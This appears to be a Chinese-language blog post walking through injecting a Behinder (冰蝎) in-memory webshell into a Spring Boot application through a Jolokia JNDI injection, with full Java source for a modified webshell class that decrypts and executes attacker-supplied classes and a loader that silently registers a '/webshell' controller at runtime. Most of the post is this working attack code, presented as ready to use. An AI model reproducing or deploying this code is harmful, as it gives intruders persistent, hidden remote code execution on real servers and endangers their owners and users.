SpringBoot注入冰蝎内存马实践
本文以SpringBoot的jolokia存在jndi 注入为例讲如何向服务器注入冰蝎内存马,环境来自SpringBootVulExploit。
首先给下改造好的冰蝎代码
package com.evil;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;
public class Beh{
public void index(final HttpServletRequest req, final HttpServletResponse resp) {
try {
if (req.getMethod().equals("POST")) {
String k = "e45e329feb5d925b"; // rebeyond
HttpSession session = req.getSession();
session.putValue("u", k);
Cipher c = Cipher.getInstance("AES");
c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
final Map myPageContext = new HashMap ();
myPageContext.put("session", session);
myPageContext.put("response", resp);
myPageContext.put("request", req);
req.setCharacterEncoding("ISO-8859-1");
ClassLoader classLoader = this.getClass().getClassLoader();
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClass.setAccessible(true);
byte[] b = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(req.getReader().readLine()));
Object object = defineClass.invoke(classLoader, b, 0, b.length);
Method newInstance = Class.class.getDeclaredMethod("newInstance");
newInstance.invoke(object, null).equals(myPageContext);
}
}
catch(Exception e)
{
e.printStackTrace();
}
}
}
冰蝎的wbshell脚本转为.java有两个问题需要解决,一个是.jsp的pageContext,pageContext是jsp脚本才有的变量,.java中是不存在的,pageContext是用来获取request、response和session,所以根据冰蝎客户端较新版中的代码实现只需要声明一个HashMap变量myPageContext,把request、response和session依次存入map中即可。第二个是.jsp中定义了一个继承ClassLoader的U,作用是调用defineClass构造class对象,那我们可以直接用反射去调用ClassLoader的defineClass方法,省去U的定义。
SpringBoot动态注入注册controller参考java内存shell学习,代码如下:
import org.springframework.web.bind.annotation.RequestMethod;
public class LoadBeh {
static
{
try {
String codeClass = ""; // Beh.class base64编码
byte[] bytes1 = new sun.misc.BASE64Decoder().decodeBuffer(codeClass);
java.lang.reflect.Method m = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{String.class, byte[].class, int.class, int.class});
m.setAccessible(true);
ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
m.invoke(classLoader, new Object[]{"com.evil.Beh", bytes1, 0, bytes1.length});
javax.servlet.ServletContext sss = ((org.springframework.web.context.request.ServletRequestAttributes) org.springframework.web.context.request.RequestContextHolder.getRequestAttributes()).getRequest().getSession().getServletContext();
org.springframework.web.context.WebApplicationContext context = org.springframework.web.context.support.WebApplicationContextUtils.getWebApplicationContext(sss);
org.springframework.web.servlet.mvc.condition.PatternsRequestCondition url =
new org.springframework.web.servlet.mvc.condition.PatternsRequestCondition(new String[]{"/webshell"}); //webshell url
RequestMethod[] a = {RequestMethod.GET, RequestMethod.POST};
org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition ms = new org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition(a);
org.springframework.web.servlet.mvc.method.RequestMappingInfo info = new org.springframework.web.servlet.mvc.method.RequestMappingInfo(url, ms, null, null, null, null, null);
org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping rs = context.getBean(org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping.class);
m = (Class.forName("com.evil.Beh", true, classLoader).getDeclaredMethods())[0];
rs.registerMapping(info, Class.forName("com.evil.Beh", true, classLoader).newInstance(), m);
System.out.println("add Behinder successfully");
}
catch (Exception e)
{
e.printStackTrace();
}
}
}LoadBeh.java即准备要执行的 Java 代码,接下来只要按照SpringBootVulExploit中的利用过程即可成功注入冰蝎内存马,用最新版的冰蝎客户端v3.0_Beta_11连接成功。
评论
发表评论